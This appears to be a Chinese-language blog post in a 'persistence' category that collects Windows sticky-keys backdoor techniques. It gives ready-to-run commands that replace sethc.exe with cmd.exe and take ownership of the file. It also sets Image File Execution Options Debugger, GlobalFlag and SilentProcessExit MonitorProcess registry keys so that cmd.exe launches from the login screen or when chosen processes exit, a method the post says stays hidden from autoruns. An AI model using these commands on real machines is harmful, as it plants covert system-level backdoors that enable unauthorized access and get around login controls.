分类 权限维持 下的文章
使用GlobalFlags劫持任意进程镜像持久化/sethc.exe在不同版本后门应用整理
使用GlobalFlags劫持任意进程镜像持久化/sethc.exe在不同版本后门应用整理
[toc]
windows 2k3
单条命令执行
windows 2003/xp
这种方式就比较普遍了
利用copy来替换sethc.exe
copy c:\windows\system32\sethc.exe c:\windows\system32\sethc2.exe
copy c:\windows\system32\cmd.exe c:\windows\system32\sethc.exewindows 2008/win7
单条命令执行
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v "Debugger" /t REG_SZ /d "cmd.exe" /f
或者还可以使用上面的功能。不过需要修改权限。
所有文件及文件夹、子文件夹下的所有者更改为管理员组(administrators)
takeown /f c:\windows\system32\sethc.* /a /r /d y
cacls c:\windows\system32\sethc.* /T /E /G administrators:F
多条命令执行
在看到近期一个表哥发的文章可以利用映像劫持的方式留shift后门,在5下shift后成功弹出了sethc,然后还可以在执行恶意文件
其中利用的方式
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /f
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v GlobalFlag /t REG_DWORD /d 512 /f
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\sethc.exe" /v ReportingMode /t REG_DWORD /d 1 /f
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\sethc.exe" /v MonitorProcess /t REG_SZ /d "c:\windows\system32\cmd.exe" /f
Global Flags劫持任意exe镜像
上面的文章中提到了Globalflags,这个工具是包含在 Debugging Tools for Windows(WinDbg)下的。
本地可以利用winsdk_web.exe去安装。
点击应用后在打开notepad后
这里是利用gflags的监视进程把监视进程设置成cmd.exe,原理就是修改了三个注册表内容,添加了MonitorProcess的键值。
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\calc.exe" /v GlobalFlag /t REG_DWORD /d 512 /f
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\calc.exe" /v ReportingMode /t REG_DWORD /d 1 /f
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\calc.exe" /v MonitorProcess /t REG_SZ /d "c:\windows\system32\cmd.exe" /f
https://oddvar.moe/2018/04/10/persistence-using-globalflags-in-image-file-execution-options-hidden-from-autoruns-exe/
https://payloads.cn/2019/1205/shfit-image-hijacks-backdoor-new-gameplay.html
https://www.anquanke.com/post/id/151425
WUSA.exe和COM越权复制文件绕过某安全助手添加启动项
Linux后门总结-内容
Linux后门总结
谢谢wing大佬给的思路
细节过几天在发出来。